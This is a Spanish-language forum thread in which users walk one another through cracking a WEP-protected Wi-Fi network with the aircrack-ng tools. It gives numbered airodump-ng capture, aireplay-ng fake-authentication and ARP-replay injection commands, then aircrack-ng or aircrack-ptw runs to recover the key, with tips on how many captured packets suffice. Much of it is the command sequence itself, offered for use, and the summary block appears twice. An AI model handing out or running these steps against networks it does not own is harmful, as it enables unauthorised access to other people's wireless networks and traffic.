Yo con autentificarme una vez me es bastante y va muy bien. Además si no hay datos yo uso ataque por fragmentación..., en cuanto llega un dato sube a toda velocidad.
Saludos

Resumiendo:

1. airodump-ng -c canal_del_ap --bssid nombre_del_ap -w fichero_de_captura nombre_de tu_interfaz_wifi

2. aireplay-ng -1 10 -e nombre_del_ap -a mac_del_ap -h tu_mac

3. aireplay-ng -3 -b mac_del_ap -h tu_mac nombre_de tu_interfaz_wifi *

* el paso 2 no seria necesario en caso de que hubiera cliente(s) ya asociados al ap o punto de acceso en cuestion. En ese caso el punto 3 seria:

 aireplay-ng -3 -b mac_del_ap -h mac_cliente_ya asociado nombre_de tu_interfaz_wifi *

aunque no pasa nada si ejecutas el paso 2 en esta situacion..

Bueno, espero que solvente tus dudas. De todas formas mirate los tutoriales que rulan por el foro que te lo explican todo mas extenso.

Venga un saludo

Resumiendo:

1. airodump-ng -c canal_del_ap --bssid nombre_del_ap -w fichero_de_captura nombre_de tu_interfaz_wifi

2. aireplay-ng -1 10 -e nombre_del_ap -a mac_del_ap -h tu_mac

3. aireplay-ng -3 -b mac_del_ap -h tu_mac nombre_de tu_interfaz_wifi *

* el paso 2 no seria necesario en caso de que hubiera cliente(s) ya asociados al ap o punto de acceso en cuestion. En ese caso el punto 3 seria:

 aireplay-ng -3 -b mac_del_ap -h mac_cliente_ya asociado nombre_de tu_interfaz_wifi *

aunque no pasa nada si ejecutas el paso 2 en esta situacion..

Bueno, espero que solvente tus dudas. De todas formas mirate los tutoriales que rulan por el foro que te lo explican todo mas extenso.

Venga un saludo

Me las explicado de futisima mare. Decirte solo una cosita. Ya saque mi propia wep, pero com mi pc conectado como cliente para capturar datas. Si no hay clientes conectados, de la otra forma que tu dices, se capturan datas a buena velocidad? Gracias

Hola dj_king,

El nombre de lfichero se lo has especificado anteriormente al airodump asi:

airodump-ng -w nombre_de_fichero nomre_de_tu_interfaz_wifi

El fichero sera en este caso: nombre_de_fichero.cap y estara ubicado en el direcorio desde el que hayas ejecutado el comando airodump-ng.

Y ya te digo, mejor no pararlo y ejecutar aircrack ruta_de_nombre_de_fichero.cap asi el solo ira cogiendo los IVs a medida que el airodump los vaya generando en el fichero. Si, claro que puedes parar el airodump, ningun problema, solo que como ya dije, si los IVs "cazados" no son suficientes el aircrack no va a sacar la WEP y vas a tenet que empezar de 0. Ya, ya,....., igual para algunos volver a cazar 60000 de nuevo es cosa de 2 minutos, pero para otros no. Sin mas.

venga, un saludo

Solo un apunte:Cuando dices "º descifrando
Cuando ya tenemos de 60.000 paquetes para arriba, paramos el airodump, hacemos dir y vemos como se llama el fichero .cap"

Mejor no pararlo ya que si lo haces y con 60.000 paquetes el aircrack no puede sacar la clave tendras que repetir el proceso desde 0. Dejarlo corriendo y el propio aircrack ira probando con los consiguientes paquetes segun se vayan pillando. Resumiendo, cuando llegue a esa cifra (a veces con 20000 es suficiente para el aircrack-ptw), correr el aircrack-ptw de la siguiente manera:  aircrack-ptw ficherocap.cap .

Pues eso, un pequeño apunte.
Suerte

Ultima revisión: 01/09/07
Revisión=>676

http://www.sendspace.com/file/of1f6e